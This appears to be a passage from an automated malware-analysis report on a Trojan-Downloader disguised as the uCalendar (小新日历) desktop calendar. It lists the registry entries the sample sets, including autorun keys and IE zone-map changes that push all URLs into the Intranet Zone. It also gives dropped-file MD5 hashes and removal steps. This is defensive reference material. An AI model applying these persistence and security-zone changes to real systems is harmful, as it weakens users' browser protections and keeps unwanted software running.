[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: User" = "%CurrentUserName%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLUpdateInfo" = "www.xiaoxinrili.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Comments" = "小新日历最专业日历应用平台"
"Inno Setup: Setup Version" = "5.5.5 (u)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015011420150115\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MinorVersion" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: Language" = "chinesesimp"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"MajorVersion" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Inno Setup: App Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 F4 0B AA 1C 84 BC 31 25 87 90 2D AC 0D 24 63"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"HelpLink" = "www.xiaoxinrili.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"URLInfoAbout" = "www.xiaoxinrili.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"DisplayName" = "小新日历4.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"QuietUninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.exe /SILENT"
[HKCU\Software\xiaoxinrili]
"Path" = "c:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CacheLimit" = "8192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011420150115]
"CachePrefix" = ":2015011420150115:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{39E75F67-A843-44A0-B22E-8A4052ACC746}_is1]
"Contact" = "www.xiaoxinrili.com"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\"
"DisplayVersion" = "4.0"
The Trojan-Downloader modifies IE security zone settings to map all local web-nodes whose names contain no dots and that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To run itself automatically each time Windows boots, the Trojan-Downloader adds the following reference to its file under the registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliquicken" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe apprun"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Trojan-Downloader adds the following reference to its file under the registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"
The Trojan-Downloader deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014041520140416]
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process uCalendar.exe:1840 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar]
"riliquicken.exe" = "小新日历加速程序"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 5F 4E 19 04 09 8C 48 C3 6D AC CA D8 F0 5E AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE security zone settings to map all local web-nodes whose names contain no dots and that do not belong to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Trojan-Downloader adds the following reference to its file under the registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"riliRun" = "%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe -run"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
e6c684ccc9c4197511fc63a9fce99e6d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX64.exe |
1c9b446e7bb1688408b00cbb1427654a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\DriverInstallerX86.exe |
3af3015a20b946d5a517bcb759704adb | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\WDJDriverInstaller.exe |
47889977579454b72714878b9c422e53 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\adb_dev.dll |
1e4985656fddb10f1538284d43a0a515 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libcurl.dll |
6d0f9f92c799356c14a104070a36fd4a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\libeay32.dll |
1658dc894eb4174e9c3f69ffc5dba5fb | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\ssleay32.dll |
ee51801b1fa295a7e16dc6b75937e299 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdj_connection.dll |
e9154ab5eacc68f37241d902949002e5 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx64.exe |
b1b3323ae79de68dc20114cf190e128b | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WDJConnEngine\2.69.0.5490\wdjconx86.exe |
9a3f1e0e960edc18a9e1b7327c45193a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\DesktopCalendar.dll |
a56f6ae4b2bac4d224485f9387a4404b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace.dll |
2461c65c1a87ff4edb70600d05d46015 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\Replace64.dll |
f07e819ba2e46a897cfabf816d7557b2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\CallbackCtrl.dll |
5841c3c749ff25672f41b1a9390577d5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\ItDownload_wex.dll |
1094c2460f1757666259fb054ac4e17e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WListViewEx.dll |
500c424b869029816b2bfaf1e219b918 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\WSysInfo.dll |
0177746573eed407f8dca8a9e441aa49 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\botva2.dll |
d0372bedb70710aeff382818ad683f54 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\UninsFiles\webctrl.dll |
2b3abef5bc1c547656c6ac6bfc1c5517 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliquicken.exe |
9b21f129e74ea0507bfbb48c05db8f34 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\riliser.exe |
496f899db2b789863e38d6e433f12987 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalExternal.exe |
1f5083874528f2bf4e8b1f075214c827 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalHtml.exe |
deb160af36bb91551be77789fa1743c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\uCalendar.exe |
e025ac5fba63f331f27418e681405f70 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\ui_d.dll |
adb0f9096aade0d914d8d6e33d69f886 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\unins000.exe |
5f0218693884a23493c4d700684c9076 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\update.exe |
31ebf7ed3fe2459cadd9c72544dce8a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\uCalendar\wdj_connection_wrapper.dll |
5f0218693884a23493c4d700684c9076 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\tmp[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
attrib.exe:1168
attrib.exe:1520
%original file name%.exe:2040
riliquicken.exe:408
6acad04bb03501dc920778ed12ba6d63.tmp:560
uCalendar.exe:1840
- Delete the original Trojan-Downloader file.
- Delete or disinfect the following files created/modified by the Trojan-Downloader:
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KKAGK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-4A2KS.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-5UAA5.tmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-M2S8M.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GA32U.tmp (713 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-7RVE9.tmp (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-K5UU2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-GN5N1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-1Q822.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CHN29.tmp (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\xttj[1].htm (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-AU387.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-9OFM7.tmp (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-59Q2H.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQAU1.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-S5QPM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-F61GP.tmp (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-EM3D2.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PAS5F.tmp (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JCVVM.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MB7TH.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DPTNS.tmp (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-USMNK.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-84K0R.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FODVB.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-UF6NE.tmp (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-JVH2E.tmp (792 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-PEHSU.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\unins000.dat (77177 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SOF93.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BD63S.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RE4AE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-47L4D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-TOHRA.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KPEV6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-82AQ4.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\Icons\ab091a108ba11a214cb2497830748b5a.ico (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-OIK1B.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LM96A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-2UJR7.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-BFVNJ.tmp (309 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-T7SDK.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DMUUF.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\UninsFiles\is-NQK6G.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-179PC.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-VKG5F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-64LEO.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-8IFBJ.tmp (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-19FF6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0UA5R.tmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CK9D1.tmp (833 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-04CEU.tmp (615 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KSVR2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-0IGTG.tmp (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-N3NUO.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WListViewEx.dll (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-3ID9I.tmp (398 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SNKL9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-589D2.tmp (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-NK9JL.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DIS2A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-SIE6F.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\is-VDS88.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RQ06S.tmp (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-15K0J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-26K4C.tmp (613 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\data\is-F0AFL.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-ODTLG.tmp (394 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-P4A60.tmp (13 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4820 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-A0EIM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-RNBC6.tmp (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LL8KV.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-LN8C3.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-KLVNJ.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-DFOPO.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-MKQ0P.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-CTVUM.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\skin\uCalendar\is-FLS7N.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-5B6H7.tmp\WSysInfo.dll (42 bytes)
